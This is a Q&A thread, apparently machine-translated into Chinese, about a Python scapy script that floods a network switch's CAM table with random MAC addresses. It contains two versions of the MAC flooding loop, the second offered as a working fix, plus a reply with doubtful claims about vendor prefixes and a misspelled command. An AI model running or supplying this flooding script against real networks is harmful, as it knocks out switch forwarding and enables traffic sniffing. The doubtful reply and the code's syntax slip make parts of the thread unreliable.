我正在尝试在 python 中制作一个小型 mac Flood 工具来填充我的开关凸轮表,但我无法让魔法发生?你能看到我做错了什么吗?
from scapy.all import *
while 1:
dest_mac = RandMAC()
src_mac = RandMAC()
sendp(Ether(src=src_mac, dst=dest_mac)/ARP(op=2, psrc="0.0.0.0", hwsrc=src_mac, hwdst=dest_mac)/Padding(load="X"*18), verbose=0)
虽然代码似乎运行良好,但它只是不做它的工作。为了测试它,我使用wireshark查看数据包然后运行THC的寄生虫“哪个有效”并且数据包几乎相同,所以我不确定发生了什么。感谢您的任何帮助。
你只能使用一些mac地址:一个mac地址由六组两个十六进制数字组成,用连字符(-)或冒号(:)分隔。前三个字段必须填写一些值,每个供应商都不同。如果此字段未设置任何供应商代码,则服务器(或客户端)将丢弃数据包。您可以在 wireshark 的 manuf 文件中找到 mac 供应商列表,或者简单地使用 google 查找。您可以通过在终端中键入“sudo ifcofig IFACE ether hw ADDRESS”来查看地址。
江田,
交换机只使用源地址来学习 Mac 地址,因此无需担心目标随机化。
我已经对此进行了测试,它似乎运行良好..您可能还想尝试使用 sendpfast 选项进行洪水,但是在我的测试中,sendp 似乎运行得更快?
from scapy.all import *
while 1:
sendp(Ether(src=RandMAC(),dst="FF:FF:FF:FF:FF:FF")/ARP(op=2, psrc="0.0.0.0", hwdst="FF:FF:FF:FF:FF:FF")/Padding(load="X"*18)))